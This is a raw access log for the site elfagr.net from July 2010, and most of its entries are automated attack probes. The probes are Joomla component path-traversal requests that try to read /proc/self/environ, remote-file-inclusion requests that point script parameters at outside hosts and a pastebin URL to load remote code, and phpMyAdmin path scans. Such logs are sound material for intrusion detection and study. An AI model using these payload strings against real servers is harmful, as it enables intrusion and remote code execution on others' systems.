85.159.220.138 - - [03/Jul/2010:03:35:40 -0700] "GET /images/p1_ed34.jpg HTTP/1.1" 404 - "http://deedat.wordpress.com/2007/01/09/%D8%A7%D9%84%D8%B5%D8%AD%D9%81-%D8%AA%D8%AA%D8%AD%D8%AF%D8%AB-%D8%B9%D9%86-%D8%A7%D8%A8%D9%86-%D8%A3%D8%AE%D8%AA-%D8%A7%D9%84%D8%A3%D9%86%D8%A8%D8%A7-%D8%A8%D9%8A%D8%B4%D9%88%D9%8A-%D8%A7%D9%84%D8%B0/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)" "www.elfagr.net"
85.159.220.138 - - [03/Jul/2010:03:35:55 -0700] "GET /images/p1_ed34.jpg HTTP/1.1" 404 - "http://deedat.wordpress.com/2007/01/09/%D8%A7%D9%84%D8%B5%D8%AD%D9%81-%D8%AA%D8%AA%D8%AD%D8%AF%D8%AB-%D8%B9%D9%86-%D8%A7%D8%A8%D9%86-%D8%A3%D8%AE%D8%AA-%D8%A7%D9%84%D8%A3%D9%86%D8%A8%D8%A7-%D8%A8%D9%8A%D8%B4%D9%88%D9%8A-%D8%A7%D9%84%D8%B0/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:52:42 -0700] "GET /logs/access_100204.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:52:53 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:52:53 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:10 -0700] "GET /phpMyAdmin/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:10 -0700] "GET /phpmyadmin/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:20 -0700] "GET /pma/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:20 -0700] "GET /admin/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:10 -0700] "GET /dbadmin/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:10 -0700] "GET /mysql/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:21 -0700] "GET /php-my-admin/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
208.71.173.74 - - [03/Jul/2010:03:53:11 -0700] "GET /myadmin/main.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:03:54:45 -0700] "GET /logs/access_100218.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:00:35 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:00:35 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:00:48 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [03/Jul/2010:04:00:49 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:04:05:59 -0700] "GET /sitemap.xml HTTP/1.1" 200 189 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:45 -0700] "GET /logs/access_091119.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:35 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:45 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:45 -0700] "GET /logs/access_091119.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:45 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:45 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [03/Jul/2010:04:16:02 -0700] "GET /logs/access_091119.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [03/Jul/2010:04:16:02 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
69.64.47.65 - - [03/Jul/2010:04:15:52 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:54 -0700] "GET /logs/access_091119.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:16:05 -0700] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
66.135.41.16 - - [03/Jul/2010:04:15:54 -0700] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.one-and-only-clan.eu/e107_admin/e107/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:29:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:29:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
91.121.67.226 - - [03/Jul/2010:04:40:57 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.67.226 - - [03/Jul/2010:04:40:58 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:41:11 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:41:41 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:41:31 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:41:52 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:43:08 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:43:08 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
91.121.67.226 - - [03/Jul/2010:04:43:11 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.67.226 - - [03/Jul/2010:04:43:22 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.67.226 - - [03/Jul/2010:04:49:08 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
91.121.67.226 - - [03/Jul/2010:04:48:58 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:04:50:29 -0700] "GET /logs/access_100408.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:04:51:01 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:04:50:55 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:52:31 -0700] "GET /logs/access.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:52:21 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:52:21 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:52:46 -0700] "GET /logs/access_100114.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:04:53:23 -0700] "GET /logs/access_091217.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:04:53:23 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:04:53:23 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:54:07 -0700] "GET /logs/access_100204.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:54:18 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:54:08 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
78.41.233.128 - - [03/Jul/2010:04:54:45 -0700] "GET /logs/access_100225.log//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:57:12 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:57:12 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:57:12 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:58:41 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:58:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [03/Jul/2010:04:58:30 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:03:44 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:05:10:55 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:05:10:45 -0700] "GET /logs/access_091119.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:05:10:45 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:05:10:45 -0700] "GET /logs/access_091015.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:14:14 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:14:04 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:14:15 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
216.129.119.41 - - [03/Jul/2010:05:14:19 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:15:18 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:15:29 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:15:29 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
67.218.116.170 - - [03/Jul/2010:05:18:37 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
207.46.199.38 - - [03/Jul/2010:05:29:15 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.elfagr.net"
207.46.199.38 - - [03/Jul/2010:05:30:04 -0700] "GET / HTTP/1.1" 200 1465 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:05:32:43 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.elfagr.net"
208.115.111.247 - - [03/Jul/2010:05:32:43 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "elfagr.net"
93.158.149.32 - - [03/Jul/2010:05:34:36 -0700] "GET /logs/access_100610.log HTTP/1.1" 200 65536 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:35:15 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:35:15 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
110.45.144.106 - - [03/Jul/2010:05:35:26 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
80.249.165.44 - - [03/Jul/2010:05:47:57 -0700] "GET /logs//include/mail.inc.php?root=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
80.249.165.44 - - [03/Jul/2010:05:48:06 -0700] "GET /include/mail.inc.php?root=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
80.249.165.44 - - [03/Jul/2010:05:48:35 -0700] "GET /logs//include/mail.inc.php?root=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
80.249.165.44 - - [03/Jul/2010:05:48:44 -0700] "GET /include/mail.inc.php?root=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
80.249.165.44 - - [03/Jul/2010:05:48:59 -0700] "GET /logs//include/mail.inc.php?root=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
80.249.165.44 - - [03/Jul/2010:05:49:08 -0700] "GET /include/mail.inc.php?root=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:05:55:47 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:05:57:43 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:05:57:33 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
195.190.166.35 - - [03/Jul/2010:05:57:33 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:06:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:06:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:06:07:49 -0700] "GET /appserv/main.php?appserv_root=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:06:07:49 -0700] "GET /logs/access_100107.log%20%20//appserv/main.php?appserv_root=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:06:07:39 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [03/Jul/2010:06:07:39 -0700] "GET /logs/access_091126.log%20%20//appserv/main.php?appserv_root=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
207.58.140.245 - - [03/Jul/2010:06:10:54 -0700] "GET /logs//index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
207.58.140.245 - - [03/Jul/2010:06:11:05 -0700] "GET /index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.136.55.175 - - [03/Jul/2010:06:11:48 -0700] "GET /index.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
93.158.149.32 - - [03/Jul/2010:06:16:04 -0700] "GET /logs/access_100204.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:22:59 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:22:59 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:23:00 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:23:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:23:00 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
85.19.150.100 - - [03/Jul/2010:06:23:00 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
